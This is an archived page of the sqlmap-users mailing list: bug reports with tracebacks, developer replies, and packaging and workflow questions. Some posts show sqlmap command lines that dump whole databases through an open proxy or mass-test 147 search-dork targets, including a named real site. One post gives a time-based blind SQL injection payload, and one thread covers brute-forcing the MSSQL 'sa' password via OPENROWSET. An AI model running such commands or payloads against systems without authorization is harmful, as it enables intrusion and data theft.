sqlmap-users — sqlmap users mailing list

[sqlmap-users] sqlmap error

[Dusan L. <dus...@gm...>]

[20:02:09] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run 
with the
  latest development version from the Subversion repository. If the 
exception per
sists, please send by e-mail to sql...@li... the 
following
  text and any information required to reproduce the bug. The developers 
will try
  to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9 (r3630)
Python version: 2.7.2
Operating system: nt
Command line: D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py 
--proxy=htt
p://186.215.202.163:8080 -u 
****************************************************
***************** --random-agent --dump-all --exclude-sysdb --eta
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
   File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py", line 
82, in mai
n
     start()
   File "D:\Anon Hacking\Black 
Hat\SQLi\SQLmap\SQLmap\lib\controller\controller.p
y", line 447, in start
     action()
   File "D:\Anon Hacking\Black 
Hat\SQLi\SQLmap\SQLmap\lib\controller\action.py",
line 106, in action
     conf.dbmsHandler.dumpAll()
   File "D:\Anon Hacking\Black 
Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration
.py", line 1496, in dumpAll
     data = self.dumpTable()
   File "D:\Anon Hacking\Black 
Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration
.py", line 1275, in dumpTable
     colString = ", ".join(column for column in colList)
TypeError: sequence item 1: expected string or Unicode, NoneType found

[*] shutting down at: 20:02:09

Re: [sqlmap-users] pre-generated tarballs for sqlmap > 0.9

[Bernardo D. A. G. <ber...@gm...>]

Quick update on this, I have opted to tag versions in git directly.
Please, find the packaged versions of sqlmap under
https://github.com/sqlmapproject/sqlmap/tags now. We will keep on
tagging new versions in the same way.

Bernardo


On 12 July 2012 14:52, Ruslan Mahmatkhanov <cv...@ya...> wrote:
>
> Hi,
>
> Bernardo Damele A. G. wrote on 12.07.2012 15:43:
>
>> Hi Ruslan,
>>
>> Soon we will tag previous versions of sqlmap against Git revisions so
>> these will show up under https://github.com/sqlmapproject/sqlmap/tags
>> tab in GitHub and you will be able to clone locally the repository at
>> a certain version.
>> I have also uploaded the .tar.gz of all previous versions to
>> https://github.com/sqlmapproject/sqlmap/downloads so there is no
>> longer need for the SourceForge File List page at all.
>>
>> Never versions will also tagged in the repository and available as a
>> .tar.gz on GitHub.
>>
>> I will soon make sure that a file will all MD5 and SHA1 hashes is also
>> uploaded to the 'Downloads' page.
>>
>> Please, advise if you see any room for improvements of the release
>> process.
>>
>> Thank you.
>> Bernardo
>
>
> Thanks a bunch for this! How annoying for you this would be to upload each
> new release to downloads/ subdirectory? I understand that it's less hard
> just to tag some revision and github will do all the magic, but it's more
> fast and easy for users/packagers. I'm fine with both (in terms of FreeBSD
> packaging), but static tarballs in downloads are preferred. While you on
> this, would you please place sqlmap-0.9.tar.gz there (now 0.9 is the only
> release that packed with zip) and I add github as primary mirror. Thank you.
>
> PS. While I wrote this I see that there is 0.9.tar.gz already. Thanks.
>
>
>>
>>
>> On 12 July 2012 12:31, Ruslan Mahmatkhanov <cv...@ya...> wrote:
>>>
>>> Good day!
>>>
>>> I's a good news that sqlmap finally got the new homepage and github
>>> repo. The only thing that I feel inconvenient for packagers - is a lack
>>> of pregenerated tarballs. Some package repositories (like FreeBSD port's
>>> collection) depend on checksums of downloaded tarballs, so to
>>> continue to maintain sqlmap in the ports I will need to update the
>>> FreeBSD port after every commit into the sqlmap repository (because of
>>> tarball checksum changes). Are you planning to create fixed tarballs for
>>> new versions of sqlmap in near future? I known github has facility to do
>>> so.
>>>
>>> Thanks.
>
>
> --
> Regards,
> Ruslan
>
> Tinderboxing kills... the drives.
>
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] bruteforce SA password using SQL INJECTION

[Bernardo D. A. G. <ber...@gm...>]

Hi Juan,

Microsoft SQL Server has a built-in function called OPENROWSET to
query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
released a paper demonstrating how to abuse this function to perform a
DBMS user's password brute-force attack within the MSSQL instance. A
few years later the attack has been automated in sqlninja[1].
We have an issue open on GitHub[2] to implement the same DBA password
brute-force attack. We have the required code in place, see issue
#34[3] and will soon close the whole thing.

However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
2005 RTM it is disabled by thereforce, hence either the database
administrator has manually enabled it, or you won't be able to abuse
this function to brute-force the 'sa' (DBA) password hash or run
statements on his behalf.

[1] http://sqlninja.sourceforge.net
[2] https://github.com/sqlmapproject/sqlmap/issues/31
[3] https://github.com/sqlmapproject/sqlmap/issues/34

Regards,
Bernardo


On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
> there is a way for bruteforce the SA password using SQL INJECTION?
>
> this is the Scenario. it is a DataBase Server (Sql Server 2008) without
> access to the internet (it has the 1433 port blocked),
> the current user is a normal user (low privileges User). cannot get SA hash
> password.
>
> the question is, is there any tool or code or way to bruteforce the SA
> password? without direct access to the Sql Server?
>
> It is a request for add this functionality to SQLMAP, I don't know if is
> possible.
>
> Thanks.
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] Bug reports / Feature requests

[Bernardo D. A. G. <ber...@gm...>]

Hi Anton,

As Miroslav has already said, the preferred way to report bugs/request
features is now via GitHub issues[1], nevertheless, the mailing list
is always a viable vector to discussion and iteract between developers
and users.

We have recently updated our homepage[2] and FAQ wiki page[3] to
reflect the recent changes in our project management workflow. Citing
the FAQ:

"""
How can I report bugs or request new features?

Bug reports are welcome! Please report all bugs on the issue tracker
or, alternatively, to the mailing list.

Guidelines:

* Before you submit a bug report, search both open and closed issues
to make sure the issue has not come up before. Also, check the user's
manual for anything relevant.
* Make sure you can reproduce the bug with the latest development
version of sqlmap.
* Your report should give detailed instructions for how to reproduce
the problem. If sqlmap raises an unhandled exception, the traceback is
needed. Details of the unexpected behaviour are welcome too. A small
test case (just a few lines) is ideal.
* If you are making an enhancement request, lay out the rationale for
the feature you are requesting. Why would this feature be useful?
* If you are not sure whether something is a bug, or want to discuss a
potential new feature before putting in an enhancement request, the
mailing list is a good place to bring it up.
"""

Other FAQs are relevant and updated now, I recommend you read them too
if you are interested.

[1] https://github.com/rapid7/metasploit-framework/issues
[2] http://sqlmap.org
[3] https://github.com/sqlmapproject/sqlmap/wiki/FAQ

Regards,
Bernardo


On 20 July 2012 09:57, Miroslav Stampar <mir...@gm...> wrote:
> Hi Anton
>
> On Fri, Jul 20, 2012 at 10:53 AM, Anton Sazonov <hy...@ef...> wrote:
>>
>> Hi Miroslav and Bernardo:
>>
>> I just wanted to clear things up regarding the workflow.
>>
>> What's the preferred method of submitting bugs and feature requests:
>> this very mailing list or the Github issues one? I'm not rather sure
>> if someone outside the project could post to the Git one, so I'd
>> welcome any clarification.
>
> Preferred way this moment is Github if the request is specific and mature
> for an issue. Otherwise we are always available via ML. Also, anybody
> registered at Github can open an issue.
>>
>>
>> And while we're at it, are the custom injectable HTTP headers still in
>> line for one of the later releases, seeing as how I don't see it as
>> being an issue on Github?
>
> https://github.com/sqlmapproject/sqlmap/issues/48
>>
>>
>> Thank you for doing a great job and being very nice and helpful about it.
>>
>> Sincerely,
>> Anton Sazonov
>
> Thank you and good by,
> Miroslav Stampar
>>
>>
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond. Discussions
>> will include endpoint security, mobile security and the latest in malware
>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] bruteforce SA password using SQL INJECTION

[Chris O. <chr...@gm...>]

Hi Juan

If openrowset is enabled then it's possible to attack with a wordlist.
This was disabled by default after sql server 2000 though, so it'd have to
be enabled.

Chris

On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:

> there is a way for bruteforce the SA password using SQL INJECTION?
>
> this is the Scenario. it is a DataBase Server (Sql Server 2008) without
> access to the internet (it has the 1433 port blocked),
> the current user is a normal user (low privileges User). cannot get SA
> hash password.
>
> the question is, is there any tool or code or way to bruteforce the SA
> password? without direct access to the Sql Server?
>
> It is a request for add this functionality to SQLMAP, I don't know if is
> possible.
>
> Thanks.
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] bruteforce SA password using SQL INJECTION

[juan m. <j.m...@gm...>]

there is a way for bruteforce the SA password using SQL INJECTION?

this is the Scenario. it is a DataBase Server (Sql Server 2008) without
access to the internet (it has the 1433 port blocked),
the current user is a normal user (low privileges User). cannot get SA hash
password.

the question is, is there any tool or code or way to bruteforce the SA
password? without direct access to the Sql Server?

It is a request for add this functionality to SQLMAP, I don't know if is
possible.

Thanks.

Re: [sqlmap-users] Bug reports / Feature requests

[Miroslav S. <mir...@gm...>]

Hi Anton

On Fri, Jul 20, 2012 at 10:53 AM, Anton Sazonov <hy...@ef...> wrote:

> Hi Miroslav and Bernardo:
>
> I just wanted to clear things up regarding the workflow.
>
> What's the preferred method of submitting bugs and feature requests:
> this very mailing list or the Github issues one? I'm not rather sure
> if someone outside the project could post to the Git one, so I'd
> welcome any clarification.
>
Preferred way this moment is Github if the request is specific and mature
for an issue. Otherwise we are always available via ML. Also, anybody
registered at Github can open an issue.

>
> And while we're at it, are the custom injectable HTTP headers still in
> line for one of the later releases, seeing as how I don't see it as
> being an issue on Github?
>
https://github.com/sqlmapproject/sqlmap/issues/48

>
> Thank you for doing a great job and being very nice and helpful about it.
>
> Sincerely,
> Anton Sazonov
>
Thank you and good by,
Miroslav Stampar

>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Bug reports / Feature requests

[Anton S. <hy...@ef...>]

Hi Miroslav and Bernardo:

I just wanted to clear things up regarding the workflow.

What's the preferred method of submitting bugs and feature requests:
this very mailing list or the Github issues one? I'm not rather sure
if someone outside the project could post to the Git one, so I'd
welcome any clarification.

And while we're at it, are the custom injectable HTTP headers still in
line for one of the later releases, seeing as how I don't see it as
being an issue on Github?

Thank you for doing a great job and being very nice and helpful about it.

Sincerely,
Anton Sazonov

Re: [sqlmap-users] sqlmap parsing XML parameters in web services

[Miroslav S. <mir...@gm...>]

p.s. example for such request file could be something like this:

POST /vuln.php HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: www.site.com
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-a4f5c1d (http://sqlmap.org)
Connection: close

<xml><bla2 value="1*"/></xml>

On Fri, Jul 20, 2012 at 9:50 AM, Miroslav Stampar <
mir...@gm...> wrote:

> Hi.
>
> For such cases where sqlmap doesn't recognize parameters inside (we have a
> SOAP parameter parsing but we could probably review it) POST request you
> can freely use custom injection mark *.
>
> Also, please update to the latest commit as there was a related "patch"
> for your case (https://github.com/sqlmapproject/sqlmap/issues/108).
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Jul 19, 2012 at 6:46 PM, * * <pip...@gm...> wrote:
>
>> Is there a way to get sqlmap to recognize xml parameters inside an
>> intercepted SOAP request?  I have a POST request with parameters in xml
>> format inside a SOAP envelope I want to test.  Thanks!
>>
>> ------------------------------------------------------------------------------
>> Live Security Virtual Conference
>> Exclusive live event will cover all the ways today's security and
>> threat landscape has changed and how IT managers can respond. Discussions
>> will include endpoint security, mobile security and the latest in malware
>> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] sqlmap parsing XML parameters in web services

[Miroslav S. <mir...@gm...>]

Hi.

For such cases where sqlmap doesn't recognize parameters inside (we have a
SOAP parameter parsing but we could probably review it) POST request you
can freely use custom injection mark *.

Also, please update to the latest commit as there was a related "patch" for
your case (https://github.com/sqlmapproject/sqlmap/issues/108).

Kind regards,
Miroslav Stampar

On Thu, Jul 19, 2012 at 6:46 PM, * * <pip...@gm...> wrote:

> Is there a way to get sqlmap to recognize xml parameters inside an
> intercepted SOAP request?  I have a POST request with parameters in xml
> format inside a SOAP envelope I want to test.  Thanks!
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] sqlmap parsing XML parameters in web services

[* * <pip...@gm...>]

Is there a way to get sqlmap to recognize xml parameters inside an
intercepted SOAP request?  I have a POST request with parameters in xml
format inside a SOAP envelope I want to test.  Thanks!

Re: [sqlmap-users] AttributeError: 'NoneType' object has no attribute 'find'

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report and find it fixed with the latest commit (
https://github.com/sqlmapproject/sqlmap/issues/101)

Kind regards,
Miroslav Stampar

On Tue, Jul 17, 2012 at 12:00 AM, M Zverev <rob...@gm...> wrote:

> [*] starting at 01:59:28
>
> [01:59:28] [INFO] parsing multiple targets list from
> 'D:/Soft/sqlmap-dev/inurl article_id=_FILTERED_U.txt'
> [01:59:28] [INFO] sqlmap got a total of 147 targets
> [01:59:28] [ERROR] invalid target url, skipping to the next url
> [01:59:28] [INFO] url 1:
> GET http://www.mamochka.kz/article.php?article_id=429
> do you want to test this url? [Y/n/q]
>  > Y
> [01:59:28] [INFO] testing url
> http://www.mamochka.kz/article.php?article_id=429
> [01:59:28] [INFO] using
> 'd:\Soft\sqlmap-dev\output\results-07172012_0159am.csv' as results file
> [01:59:28] [INFO] testing connection to the target url
> [01:59:29] [INFO] testing NULL connection to the target url
> [01:59:29] [INFO] testing if the url is stable, wait a few seconds
> [01:59:31] [WARNING] url is not stable, sqlmap will base the page
> comparison on a sequence matcher. If no dynamic nor in
> jectable parameters are detected, or in case of junk results, refer to
> user's manual paragraph 'Page comparison' and pro
> vide a string or regular expression to match on
> [01:59:31] [INFO] how do you want to proceed?
> [(C)ontinue/(s)tring/(r)egex/(q)uit] C
> [01:59:31] [INFO] testing if GET parameter 'article_id' is dynamic
> [01:59:31] [INFO] confirming that GET parameter 'article_id' is dynamic
> [01:59:31] [INFO] GET parameter 'article_id' is dynamic
>
> [01:59:31] [CRITICAL] unhandled exception in sqlmap/1.0-dev-c9bbd14,
> retry your run with the latest development version
> from the GitHub repository. If the exception persists, please send by
> e-mail to 'sql...@li...' or
> open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new'
> with the following text and any information req
> uired to reproduce the bug. The developers will try to reproduce the
> bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-c9bbd14
> Python version: 2.7.3
> Operating system: nt
> Command line: d:\Soft\sqlmap-dev\sqlmap.py -m D:/Soft/sqlmap-dev/inurl
> article_id=_FILTERED_U.txt -o --threads=5 --curre
> nt-user --current-db --dbs --tables -v 0 --batch
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>    File "d:\Soft\sqlmap-dev\_sqlmap.py", line 79, in main
>      start()
>    File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 458, in
> start
>      check = heuristicCheckSqlInjection(place, parameter)
>    File "d:\Soft\sqlmap-dev\lib\controller\checks.py", line 625, in
> heuristicCheckSqlInjection
>      page, _ = Request.queryPage(payload, place, content=True,
> raise404=False)
>    File "d:\Soft\sqlmap-dev\lib\request\connect.py", line 719, in queryPage
>      page, headers, code = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, host=host,
>   silent=silent, method=method, auxHeaders=auxHeaders,
> response=response, raise404=raise404, ignoreTimeout=timeBasedCompa
> re)
>    File "d:\Soft\sqlmap-dev\lib\request\connect.py", line 313, in getPage
>      conn = urllib2.urlopen(req)
>    File "C:\Python27\lib\urllib2.py", line 126, in urlopen
>      return _opener.open(url, data, timeout)
>    File "C:\Python27\lib\urllib2.py", line 400, in open
>      response = self._open(req, data)
>    File "C:\Python27\lib\urllib2.py", line 418, in _open
>      '_open', req)
>    File "C:\Python27\lib\urllib2.py", line 378, in _call_chain
>      result = func(*args)
>    File "d:\Soft\sqlmap-dev\thirdparty\keepalive\keepalive.py", line
> 210, in http_open
>      return self.do_open(HTTPConnection, req)
>    File "d:\Soft\sqlmap-dev\thirdparty\keepalive\keepalive.py", line
> 207, in do_open
>      return self.parent.error('http', req, r, r.status, r.reason, r.msg)
>    File "C:\Python27\lib\urllib2.py", line 438, in error
>      result = self._call_chain(*args)
>    File "C:\Python27\lib\urllib2.py", line 378, in _call_chain
>      result = func(*args)
>    File "d:\Soft\sqlmap-dev\lib\request\redirecthandler.py", line 78, in
> http_error_302
>      if not urlparse.urlsplit(redurl).netloc:
>    File "C:\Python27\lib\urlparse.py", line 174, in urlsplit
>      i = url.find(':')
> AttributeError: 'NoneType' object has no attribute 'find'
>
> [*] shutting down at 01:59:31
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] AttributeError: 'NoneType' object has no attribute 'find'

[M Z. <rob...@gm...>]

[*] starting at 01:59:28

[01:59:28] [INFO] parsing multiple targets list from 
'D:/Soft/sqlmap-dev/inurl article_id=_FILTERED_U.txt'
[01:59:28] [INFO] sqlmap got a total of 147 targets
[01:59:28] [ERROR] invalid target url, skipping to the next url
[01:59:28] [INFO] url 1:
GET http://www.mamochka.kz/article.php?article_id=429
do you want to test this url? [Y/n/q]
 > Y
[01:59:28] [INFO] testing url 
http://www.mamochka.kz/article.php?article_id=429
[01:59:28] [INFO] using 
'd:\Soft\sqlmap-dev\output\results-07172012_0159am.csv' as results file
[01:59:28] [INFO] testing connection to the target url
[01:59:29] [INFO] testing NULL connection to the target url
[01:59:29] [INFO] testing if the url is stable, wait a few seconds
[01:59:31] [WARNING] url is not stable, sqlmap will base the page 
comparison on a sequence matcher. If no dynamic nor in
jectable parameters are detected, or in case of junk results, refer to 
user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
[01:59:31] [INFO] how do you want to proceed? 
[(C)ontinue/(s)tring/(r)egex/(q)uit] C
[01:59:31] [INFO] testing if GET parameter 'article_id' is dynamic
[01:59:31] [INFO] confirming that GET parameter 'article_id' is dynamic
[01:59:31] [INFO] GET parameter 'article_id' is dynamic

[01:59:31] [CRITICAL] unhandled exception in sqlmap/1.0-dev-c9bbd14, 
retry your run with the latest development version
from the GitHub repository. If the exception persists, please send by 
e-mail to 'sql...@li...' or
open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' 
with the following text and any information req
uired to reproduce the bug. The developers will try to reproduce the 
bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-c9bbd14
Python version: 2.7.3
Operating system: nt
Command line: d:\Soft\sqlmap-dev\sqlmap.py -m D:/Soft/sqlmap-dev/inurl 
article_id=_FILTERED_U.txt -o --threads=5 --curre
nt-user --current-db --dbs --tables -v 0 --batch
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
   File "d:\Soft\sqlmap-dev\_sqlmap.py", line 79, in main
     start()
   File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 458, in 
start
     check = heuristicCheckSqlInjection(place, parameter)
   File "d:\Soft\sqlmap-dev\lib\controller\checks.py", line 625, in 
heuristicCheckSqlInjection
     page, _ = Request.queryPage(payload, place, content=True, 
raise404=False)
   File "d:\Soft\sqlmap-dev\lib\request\connect.py", line 719, in queryPage
     page, headers, code = Connect.getPage(url=uri, get=get, post=post, 
cookie=cookie, ua=ua, referer=referer, host=host,
  silent=silent, method=method, auxHeaders=auxHeaders, 
response=response, raise404=raise404, ignoreTimeout=timeBasedCompa
re)
   File "d:\Soft\sqlmap-dev\lib\request\connect.py", line 313, in getPage
     conn = urllib2.urlopen(req)
   File "C:\Python27\lib\urllib2.py", line 126, in urlopen
     return _opener.open(url, data, timeout)
   File "C:\Python27\lib\urllib2.py", line 400, in open
     response = self._open(req, data)
   File "C:\Python27\lib\urllib2.py", line 418, in _open
     '_open', req)
   File "C:\Python27\lib\urllib2.py", line 378, in _call_chain
     result = func(*args)
   File "d:\Soft\sqlmap-dev\thirdparty\keepalive\keepalive.py", line 
210, in http_open
     return self.do_open(HTTPConnection, req)
   File "d:\Soft\sqlmap-dev\thirdparty\keepalive\keepalive.py", line 
207, in do_open
     return self.parent.error('http', req, r, r.status, r.reason, r.msg)
   File "C:\Python27\lib\urllib2.py", line 438, in error
     result = self._call_chain(*args)
   File "C:\Python27\lib\urllib2.py", line 378, in _call_chain
     result = func(*args)
   File "d:\Soft\sqlmap-dev\lib\request\redirecthandler.py", line 78, in 
http_error_302
     if not urlparse.urlsplit(redurl).netloc:
   File "C:\Python27\lib\urlparse.py", line 174, in urlsplit
     i = url.find(':')
AttributeError: 'NoneType' object has no attribute 'find'

[*] shutting down at 01:59:31

Re: [sqlmap-users] unhandled exception

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report and find it fixed with the latest commit (
https://github.com/sqlmapproject/sqlmap/issues/100).

Kind regards,
Miroslav Stampar

On Mon, Jul 16, 2012 at 10:59 PM, Happy User <rob...@gm...>wrote:

> [*] starting at 00:47:56
>
> [00:47:56] [INFO] parsing multiple targets list from
> 'D:/Soft/sqlmap-dev/inurl article_id=_FILTERED_U.txt'
> [00:47:56] [INFO] sqlmap got a total of 147 targets
>
> [00:47:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5243140, retry
> your run with the latest development version
> from the GitHub repository. If the exception persists, please send by
> e-mail to 'sql...@li...' or
> open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new'
> with the following text and any information req
> uired to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-5243140
> Python version: 2.7.3
> Operating system: nt
> Command line: d:\Soft\sqlmap-dev\sqlmap.py -m D:/Soft/sqlmap-dev/inurl
> article_id=_FILTERED_U.txt --threads=5 --current-
> user --current-db --dbs --tables --exclude-sysdbs -v 0 --batch
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "d:\Soft\sqlmap-dev\_sqlmap.py", line 79, in main
>     start()
>   File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 263, in
> start
>     parseTargetUrl()
>   File "d:\Soft\sqlmap-dev\lib\core\common.py", line 1083, in
> parseTargetUrl
>     _ = conf.hostname.encode("idna")
>   File "C:\Python27\lib\encodings\idna.py", line 164, in encode
>     result.append(ToASCII(label))
>   File "C:\Python27\lib\encodings\idna.py", line 76, in ToASCII
>     label = nameprep(label)
>   File "C:\Python27\lib\encodings\idna.py", line 21, in nameprep
>     newlabel.append(stringprep.map_table_b2(c))
>   File "C:\Python27\lib\stringprep.py", line 197, in map_table_b2
>     b = unicodedata.normalize("NFKC", al)
> TypeError: must be unicode, not str
>
> [*] shutting down at 00:47:56
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] unhandled exception

[Happy U. <rob...@gm...>]

[*] starting at 00:47:56

[00:47:56] [INFO] parsing multiple targets list from
'D:/Soft/sqlmap-dev/inurl article_id=_FILTERED_U.txt'
[00:47:56] [INFO] sqlmap got a total of 147 targets

[00:47:56] [CRITICAL] unhandled exception in sqlmap/1.0-dev-5243140, retry
your run with the latest development version
from the GitHub repository. If the exception persists, please send by
e-mail to 'sql...@li...' or
open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new'
with the following text and any information req
uired to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev-5243140
Python version: 2.7.3
Operating system: nt
Command line: d:\Soft\sqlmap-dev\sqlmap.py -m D:/Soft/sqlmap-dev/inurl
article_id=_FILTERED_U.txt --threads=5 --current-
user --current-db --dbs --tables --exclude-sysdbs -v 0 --batch
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "d:\Soft\sqlmap-dev\_sqlmap.py", line 79, in main
    start()
  File "d:\Soft\sqlmap-dev\lib\controller\controller.py", line 263, in start
    parseTargetUrl()
  File "d:\Soft\sqlmap-dev\lib\core\common.py", line 1083, in parseTargetUrl
    _ = conf.hostname.encode("idna")
  File "C:\Python27\lib\encodings\idna.py", line 164, in encode
    result.append(ToASCII(label))
  File "C:\Python27\lib\encodings\idna.py", line 76, in ToASCII
    label = nameprep(label)
  File "C:\Python27\lib\encodings\idna.py", line 21, in nameprep
    newlabel.append(stringprep.map_table_b2(c))
  File "C:\Python27\lib\stringprep.py", line 197, in map_table_b2
    b = unicodedata.normalize("NFKC", al)
TypeError: must be unicode, not str

[*] shutting down at 00:47:56

Re: [sqlmap-users] Problem Injecting in ORDER BY clause

[Bernardo D. A. G. <ber...@gm...>]

Hi Korius,

I have created an issue for this,
https://github.com/sqlmapproject/sqlmap/issues/97.

Bernardo


On 4 April 2012 10:34, Korius <kor...@ya...> wrote:
> Hi list,
>
> I'm having trouble exploiting an SQLi in an ORDER BY clause with sqlmap.
> Manually I can inject using a construct like "(CASE WHEN 'a'='b' THEN
> t.bar ELSE (SELECT BENCHMARK(1000000,MD5(1))) END)" where t.bar is a
> correct column name and then altering the boolean clause. Unfortunately
> the target server responds pretty slowly, so a manual extraction is
> gonna be agonizingly slow.
>
> Just passing the target URL to sqlmap (yesterday's build 4938), sqlmap
> wont find an injection using level 3. I also tried passing my manual
> vector as prefix/suffix (--prefix="(CASE WHEN 'a'='" --suffix="' THEN
> t.bar ELSE (SELECT BENCHMARK(1000000,MD5(1))) END)") but without avail.
> Any ideas or suggestions?
>
> Cheers
> Dennis
>
> ------------------------------------------------------------------------------
> Better than sec? Nothing is better than sec when it comes to
> monitoring Big Data applications. Try Boundary one-second
> resolution app monitoring today. Free.
> http://p.sf.net/sfu/Boundary-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users



-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

Re: [sqlmap-users] --os-shell error

[Bernardo D. A. G. <ber...@gm...>]

Ahmed,

I have created an issue for this,
https://github.com/sqlmapproject/sqlmap/issues/96.

Bernardo


On 3 May 2012 16:06, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Ahmed,
>
> On 2 May 2012 21:09, Ahmed Shawky <ah...@is...> wrote:
>>
>> While using sqlmap with --os-shell I found that it only works if the
>> writable directory is on the DOCUMENT_ROOT directly
>> and if it exists on another dir sqlmap successfully uploads the php file but
>> it couldn't connect  through it
>
> This should not be the case.
>
>> ...
>> Here's data I sent manually to the application
>>
